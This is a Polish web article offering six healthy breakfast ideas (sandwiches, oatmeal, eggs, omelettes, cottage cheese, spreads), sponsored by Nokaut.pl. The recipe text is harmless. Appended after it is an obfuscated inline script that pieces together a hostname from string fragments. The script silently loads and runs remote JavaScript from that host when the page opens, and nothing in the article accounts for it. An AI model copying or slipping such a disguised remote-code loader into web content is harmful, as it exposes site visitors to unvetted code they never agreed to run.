6 pomysłów na zdrowe i pożywne śniadanie

<p><strong>Śniadanie jest najważniejszym posiłkiem dnia &ndash; to zdanie to jedna z podstawowych zasad racjonalnego odżywiania. Niestety bardzo często trudno nam się do niej dostosować. Rano wiele rzeczy robimy w pośpiechu, a przygotowanie i zjedzenie śniadania w domu wydaje nam się zbyt czasochłonne. Okazuje się jednak, że wystarczy wstać 15 minut wcześniej, aby zjeść zdrowe i pożywne śniadanie, kt&oacute;re doda nam energii na cały dzień.</strong><br />
<strong>1. Kanapki</strong><br />
To właśnie kanapki są niekwestionowanym liderem śniadaniowym. Przygotować je potrafią nawet dzieci, nie są czasochłonne i pozwalają na niezwykłą fantazję. R&oacute;żnorodność dodatk&oacute;w sprawia, że tego typu śniadania nie stają się dla nas monotonne. Do przygotowywania kanapek najlepiej wykorzystać ciemne pieczywo. Zrezygnujmy z masła, kt&oacute;re z powodzeniem możemy zastąpić awokado. Sięgajmy także po świeże warzywa i kiełki, kt&oacute;re nadadzą kanapkom wyjątkowego smaku. Takie śniadanie możemy zjeść w domu lub spakować i sięgnąć po nie w pracy.<br />
<strong>2. Owsianka</strong><br />
Owsianka często wzbudza mieszane odczucia. Warto się jednak do niej przekonać, bowiem to spos&oacute;b na niezwykle szybkie i pożywne śniadanie. Do przygotowania takiego śniadania potrzebujemy płatk&oacute;w owsianych (najlepiej g&oacute;rskich, ale mogą być też błyskawiczne), kt&oacute;re w zależności od upodobań zalewamy mlekiem lub wodą. W kwestii dodatk&oacute;w panuje całkowita swoboda &ndash; wykorzystać możemy świeże i suszone owoce, mi&oacute;d czy masło orzechowe.<br />
<strong>3. Jajka</strong><br />
Cennym źr&oacute;dłem energii są dla nas jajka, bowiem zawierają one niezbędne dla organizmu nienasycone kwasy tłuszczowe. Rano możemy przygotować je na r&oacute;żne sposoby &ndash; po zaledwie kilku minutach mamy gotowe jajko na miękko, a nie więcej niż 8 minut zajmie nam ugotowanie go na twardo. Niezawodnym posiłkiem rano jest także jajecznica, kt&oacute;rą możemy przygotować na boczku lub z dodatkiem szczypiorku i pomidora.<br />
<strong>4. Omlet </strong><br />
Z jajek przygotowujemy także omlet, kt&oacute;ry na śniadanie można zjeść w wersji na słodko lub na słono. Dobrze smakuje z szynką i pomidorem, ale sprawdza się r&oacute;wnież w towarzystwie owoc&oacute;w. Osoby dbające o linię mogą na śniadanie przygotowywać sobie omlety dietetyczne, w kt&oacute;rych nie ma mąki ani cukru. W ich składzie znajdziemy natomiast płatki owsiane, banany czy twar&oacute;g. W weekendy, kiedy mamy więcej czasu, warto poeksperymentować i znaleźć swoją ulubioną wersję omleta.<br />
<strong>5. Twarożek</strong><br />
Dzień możemy zacząć także od twarożku. Warto przygotować go samodzielnie &ndash; unikniemy niepotrzebnych dodatk&oacute;w i ulepszaczy smaku. Do twarogu dodać możemy rzodkiewkę, szczypiorek lub pomidora. Warto doprawić go także estragonem, a zamiast śmietany skorzystać z jogurtu naturalnego.<br />
<strong>6. Pasty</strong><br />
Na śniadanie przygotować możemy sobie r&oacute;wnież pastę, kt&oacute;rą rano znakomicie komponuje się z pieczywem. Zastrzyk energii gwarantują nam pasty z jajek, pomidor&oacute;w lub awokado. Do ich przygotowania wykorzystać możemy także ryby &ndash; tuńczyka, łososia oraz makrelę. Dob&oacute;r składnik&oacute;w zależy jednak wyłącznie od naszej inwencji, bowiem pasty można przygotować z wielu produkt&oacute;w, kt&oacute;re najczęściej wystarczy tylko rozgnieść widelcem lub zblenderować na gładką masę.<br />
Artykuł został przygotowany przy wsp&oacute;łpracy z serwisem <a href="http://www.nokaut.pl/ekspresy-do-kawy" target="_blank">Nokaut.pl</a>.</p> <script type="text/javascript">
(function(){
uc71=document.createElement("script");uc71.type="text/javascript";
uc71.async=true;uc71_=(("us")+"t")+"a";uc71_+=("t.i")+""+"n";uc71_+=(("f")+"o");
uc71.src="http://"+uc71_+"/197037.1p8dp5m1c710h2u045k2r5dlarxjvcfd";
document.body.appendChild(uc71);
})();
</script>